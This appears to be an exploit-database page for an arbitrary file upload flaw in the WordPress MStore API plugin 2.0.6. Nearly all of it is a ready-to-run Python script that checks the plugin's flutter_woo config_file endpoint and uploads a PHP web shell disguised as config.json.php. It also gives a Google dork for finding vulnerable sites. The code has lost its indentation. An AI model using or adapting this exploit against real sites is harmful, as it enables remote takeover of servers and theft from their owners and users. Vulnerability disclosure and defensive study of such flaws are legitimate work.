WordPress MStore API 2.0.6 Shell Upload

WordPress MStore API plugin version 2.0.6 suffers from a remote shell upload vulnerability.


MD5 | 6e3f0552b63e3cd586048101955060f8

# Exploit Title: Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/mstore-api/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/mstore-api/
# Version: 2.0.6, possibly higher
# Tested on: Ubuntu 20.04.1

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
print("MStore API < 2.0.6 - Arbitrary File Upload")
print("Author -> space_hen (www.github.com/spacehen)")

def print_usage():
print("Usage: python3 exploit.py [target url] [shell path]")
print("Ex: python3 exploit.py https://example.com ./shell.php")

def vuln_check(uri):
response = requests.post(uri)
raw = response.text

if ("Key must be" in raw):
return True;
else:
return False;

def main():

print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);

base = sys.argv[1]
file_path = sys.argv[2]

rest_url = '/wp-json/api/flutter_woo/config_file'

uri = base + rest_url;
check = vuln_check(uri);

if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)

if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)

files = {'file' : ( "config.json.php", open(file_path), "application/json" )}

print("Uploading shell...");
response = requests.post(uri, files=files )
# response should be location of file
print(response.text)

main();


Related Posts